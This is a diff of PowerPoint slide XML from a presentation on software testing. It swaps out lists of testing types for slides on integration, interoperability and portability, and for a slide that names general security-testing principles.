-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="Прямоугольник 8"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="2492896"/>
-            <a:ext cx="6588224" cy="369332"/>
+            <a:off x="251520" y="1988840"/>
+            <a:ext cx="2614964" cy="1512168"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Load testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="18" name="Рисунок 17" descr="interoperability.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="2969424"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Прямоугольник 10"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="2852936"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="3563888" y="4005064"/>
+            <a:ext cx="3680036" cy="1385149"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Performance testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="19" name="Рисунок 18" descr="portabiity.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId6" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="3329464"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="17" name="Прямоугольник 16"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="3212976"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="4211960" y="2060848"/>
+            <a:ext cx="3238163" cy="1388457"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Stress testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="Прямоугольник 19"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="3689504"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="13" name="Прямоугольник 12"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="3573016"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="539552" y="3429000"/>
+            <a:ext cx="1218347" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="none">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Usability testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
+              <a:t>Integration</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="Прямоугольник 20"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="4049544"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="18" name="Прямоугольник 17"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="3933056"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="4788024" y="5507940"/>
+            <a:ext cx="1635128" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="none">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Maintainability testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
+              <a:t>Interoperability</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="Прямоугольник 21"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="4409584"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="20" name="Прямоугольник 19"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="4293096"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="611560" y="5517232"/>
+            <a:ext cx="1436099" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="none">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Portability testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="21" name="Flowchart: Connector 13"/>
+              <a:t>Compatibility</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="Прямоугольник 22"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="936104" y="4769624"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="22" name="Прямоугольник 21"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="4653136"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="5220072" y="3429000"/>
+            <a:ext cx="1199944" cy="369332"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="none">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Reliability testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="23" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="5120372"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="24" name="Прямоугольник 23"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="5003884"/>
-            <a:ext cx="5652120" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Volume testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="25" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="5480412"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="26" name="Прямоугольник 25"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="5363924"/>
-            <a:ext cx="5652120" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Installation testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="27" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="5840452"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="28" name="Прямоугольник 27"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1224136" y="5723964"/>
-            <a:ext cx="5652120" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Configuration testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>Portability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11030,7 +10779,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -11073,7 +10822,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="533400"/>
-            <a:ext cx="3349315" cy="630942"/>
+            <a:ext cx="3026726" cy="630942"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11102,7 +10851,7 @@
                   </a:outerShdw>
                 </a:effectLst>
               </a:rPr>
-              <a:t>Structural Testing</a:t>
+              <a:t>Security Testing</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="3500" dirty="0">
               <a:solidFill>
@@ -11130,8 +10879,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="611437" y="1712098"/>
-            <a:ext cx="7416947" cy="646331"/>
+            <a:off x="755453" y="1541691"/>
+            <a:ext cx="7416947" cy="2031325"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11145,29 +10894,81 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Structural </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
-              <a:t>(white-box)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t> testing may be performed at all test levels. It is based on examination of internal (back-end) system behavior.</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
+              <a:t>Common strategy of security testing is based on the following principles:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Confidentiality</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Integrity</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Authentication</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Authorization</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Availability</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1">
+              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Non-repudiation</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="958767" y="2636912"/>
+            <a:off x="467544" y="1673280"/>
             <a:ext cx="84841" cy="99536"/>
           </a:xfrm>
           <a:prstGeom prst="flowChartConnector">
@@ -11203,42 +11004,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="Прямоугольник 8"/>
+          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1224136" y="2492896"/>
-            <a:ext cx="6588224" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Statement testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="2969424"/>
+            <a:off x="539552" y="3905528"/>
             <a:ext cx="84841" cy="99536"/>
           </a:xfrm>
           <a:prstGeom prst="flowChartConnector">
@@ -11274,14 +11046,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="11" name="Прямоугольник 10"/>
+          <p:cNvPr id="12" name="Rectangle 6"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1224136" y="2852936"/>
-            <a:ext cx="5652120" cy="369332"/>
+            <a:off x="755453" y="3773939"/>
+            <a:ext cx="7416947" cy="1754326"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -11295,187 +11067,67 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Decision testing</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="936104" y="3329464"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
